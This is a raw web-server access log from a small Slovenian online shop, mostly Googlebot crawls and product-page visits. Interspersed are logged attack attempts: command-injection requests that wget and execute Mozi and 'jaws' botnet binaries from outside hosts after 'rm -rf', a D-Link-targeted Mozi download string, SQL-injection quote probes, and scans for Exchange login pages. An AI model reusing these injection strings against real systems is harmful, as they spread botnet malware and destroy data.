167.71.239.65 - - [03/Oct/2024:09:24:43 +0200] "GET /teorema505?t=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
120.86.253.41 - - [03/Oct/2024:11:05:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 - "-" "Hello, world"
66.249.66.43 - - [03/Oct/2024:12:07:23 +0200] "GET /skupine.php?skupina=51 HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.81.168 - - [03/Oct/2024:12:44:46 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
66.249.66.42 - - [03/Oct/2024:12:44:46 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.122.71.214 - - [03/Oct/2024:12:44:46 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /dodaj_v_vozicek.gif HTTP/1.1" 200 1135 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /kvadratek.gif HTTP/1.1" 200 99 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /images/celica_desno.gif HTTP/1.1" 404 - "http://212.44.99.48/style.css" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /slike2/vozicek_m2.gif HTTP/1.1" 200 549 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
66.249.66.41 - - [03/Oct/2024:13:07:02 +0200] "GET /info.php?sifra=HDEM105m&skupina=82 HTTP/1.1" 200 19107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:13:29:23 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.203.211.106 - - [03/Oct/2024:13:35:54 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.42 - - [03/Oct/2024:13:57:44 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
156.223.82.112 - - [03/Oct/2024:14:01:15 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+82.165.221.158/jaws;sh+/tmp/jaws HTTP/1.1" 404 - "-" "Hello, world"
66.249.66.43 - - [03/Oct/2024:14:15:47 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:14:16:47 +0200] "GET /info.php?sifra=E260&skupina=83 HTTP/1.1" 200 18961 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:14:36:28 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.66.42 - - [03/Oct/2024:14:38:48 +0200] "GET /info.php?sifra=E650&skupina=83 HTTP/1.1" 200 18919 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:14:56:45 +0200] "GET /info.php?sifra=16878&skupina=85 HTTP/1.1" 200 18842 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:15:00:48 +0200] "GET /kako.php HTTP/1.1" 200 18336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET //skupine.php?skupina=31%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET //info.php?sifra=dbm020%27&skupina=0 HTTP/1.1" 200 16965 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET //info.php?sifra=dbm020&skupina=0%27 HTTP/1.1" 200 17533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.42 - - [03/Oct/2024:16:07:07 +0200] "GET /info.php?sifra=55851&skupina=40 HTTP/1.1" 200 17505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:16:20:08 +0200] "GET /info.php?sifra=30521&skupina=42 HTTP/1.1" 200 18680 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:16:37:06 +0200] "GET /info.php?sifra=V100&skupina=0 HTTP/1.1" 200 17224 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.90.22.72 - - [03/Oct/2024:18:23:36 +0200] "GET /command_port.ini HTTP/1.1" 404 - "-" "-"
66.249.66.42 - - [03/Oct/2024:18:25:07 +0200] "GET /info.php?sifra=1003026&skupina=44 HTTP/1.1" 200 18601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:18:52:13 +0200] "GET /info.php?sifra=1011404&skupina=86 HTTP/1.1" 200 19289 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:19:34:57 +0200] "GET /slike/16878_m.jpg HTTP/1.1" 200 3553 "-" "Googlebot-Image/1.0"
66.249.66.43 - - [03/Oct/2024:20:01:44 +0200] "GET /slike/50455_m.jpg HTTP/1.1" 200 3761 "-" "Googlebot-Image/1.0"
66.249.66.44 - - [03/Oct/2024:20:01:44 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
143.244.152.43 - - [03/Oct/2024:20:25:02 +0200] "GET / HTTP/1.1" 200 16604 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
66.249.66.43 - - [03/Oct/2024:22:35:55 +0200] "GET /slike/varilni-aparat-mig-210L-m.jpg HTTP/1.1" 200 2902 "-" "Googlebot-Image/1.0"
66.249.66.44 - - [03/Oct/2024:22:37:10 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:22:56:45 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.95.62.137 - - [03/Oct/2024:23:07:32 +0200] "GET / HTTP/1.0" 200 16604 "-" "-"
66.249.66.42 - - [03/Oct/2024:23:13:08 +0200] "GET /skupine.php?skupina=86 HTTP/1.1" 200 27683 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:23:14:05 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/skupine.php?skupina=86" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.194 - - [03/Oct/2024:23:31:21 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.212.73.231 - - [03/Oct/2024:23:52:46 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
66.249.66.42 - - [03/Oct/2024:00:06:41 +0200] "GET /skupine.php?skupina=106 HTTP/1.1" 200 23264 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:00:18:42 +0200] "GET /info.php?sifra=1003031&skupina=42 HTTP/1.1" 200 18590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
177.124.25.20 - - [03/Oct/2024:01:29:46 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
66.249.66.44 - - [03/Oct/2024:01:37:29 +0200] "GET /skupine.php?skupina=104 HTTP/1.1" 200 14391 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:43:00 +0200] "GET /skupine.php?skupina=32&stran=2 HTTP/1.1" 200 18907 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:44:29 +0200] "GET /info.php?sifra=1003026&skupina=42 HTTP/1.1" 200 18540 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:50:31 +0200] "GET /info.php?sifra=1003032&skupina=42 HTTP/1.1" 200 18667 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:56:33 +0200] "GET /skupine.php?skupina=105 HTTP/1.1" 200 18656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:02:28:41 +0200] "GET /skupine.php?skupina=42&stran=4 HTTP/1.1" 200 26587 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:02:39:41 +0200] "GET /info.php?sifra=50016&skupina=42 HTTP/1.1" 200 18514 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:02:44:42 +0200] "GET /skupine.php?skupina=81 HTTP/1.1" 200 25392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:02:47:42 +0200] "GET /skupine.php?skupina=44 HTTP/1.1" 200 26225 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:03:46:30 +0200] "GET /info.php?sifra=281565&skupina=103 HTTP/1.1" 200 17643 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:03:51:31 +0200] "GET /info.php?sifra=52562&skupina=63 HTTP/1.1" 200 17186 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:03:55:54 +0200] "GET /skupine.php?skupina=51 HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:03:58:33 +0200] "GET /info.php?sifra=48218&skupina=63 HTTP/1.1" 200 17151 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:03:59:33 +0200] "GET /skupine.php?skupina=63&stran=1 HTTP/1.1" 200 24960 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:04:04:34 +0200] "GET /skupine.php?skupina=63&stran=2 HTTP/1.1" 200 20507 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.84 - - [03/Oct/2024:04:05:07 +0200] "\x16\x03\x01" 200 20819 "-" "-"
198.235.24.84 - - [03/Oct/2024:04:05:08 +0200] "\x16\x03\x01" 200 20819 "-" "-"
66.249.66.44 - - [03/Oct/2024:04:20:29 +0200] "GET /slike/16.010-2.jpg HTTP/1.1" 200 7212 "-" "Googlebot-Image/1.0"
66.249.66.43 - - [03/Oct/2024:04:20:34 +0200] "GET /info.php?sifra=52564&skupina=63 HTTP/1.1" 200 17191 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:04:21:35 +0200] "GET /info.php?sifra=44051&skupina=63 HTTP/1.1" 200 17440 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.216.150.168 - - [03/Oct/2024:04:32:02 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [03/Oct/2024:04:50:38 +0200] "GET /info.php?sifra=308048&skupina=63 HTTP/1.1" 200 17390 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:04:50:39 +0200] "GET /info.php?sifra=kos002&skupina=134 HTTP/1.1" 200 17510 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:05:06:41 +0200] "GET /info.php?sifra=kos%20001&skupina=134 HTTP/1.1" 200 17673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:05:10:41 +0200] "GET /info.php?sifra=50151&skupina=40 HTTP/1.1" 200 17634 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:05:12:41 +0200] "GET /skupine.php?skupina=40&stran=3 HTTP/1.1" 200 25418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:05:15:42 +0200] "GET /skupine.php?skupina=40&stran=1 HTTP/1.1" 200 25452 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:05:15:43 +0200] "GET /info.php?sifra=50051&skupina=40 HTTP/1.1" 200 17535 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:05:21:43 +0200] "GET /info.php?sifra=56151&skupina=40 HTTP/1.1" 200 17481 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:05:30:44 +0200] "GET /info.php?sifra=50451&skupina=40 HTTP/1.1" 200 17592 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:05:48:44 +0200] "GET /info.php?sifra=08068&skupina=85 HTTP/1.1" 200 18847 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:05:48:45 +0200] "GET /info.php?sifra=16878&skupina=85 HTTP/1.1" 200 18842 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.42.121.223 - - [03/Oct/2024:05:53:25 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226 "-" "-"
66.249.66.43 - - [03/Oct/2024:05:58:46 +0200] "GET /info.php?sifra=236&skupina=89 HTTP/1.1" 200 18719 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:16:46 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:25:01 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:25:47 +0200] "GET /skupine.php?skupina=133 HTTP/1.1" 200 17753 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:35:24 +0200] "GET /pozabljenogeslo.php HTTP/1.1" 200 17176 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:35:25 +0200] "GET /info.php?sifra=2RPP&skupina=31 HTTP/1.1" 200 17716 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:37:26 +0200] "GET /skupine.php?skupina=31&stran=4 HTTP/1.1" 200 25886 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:37:27 +0200] "GET /skupine.php?skupina=31&stran=2 HTTP/1.1" 200 25884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
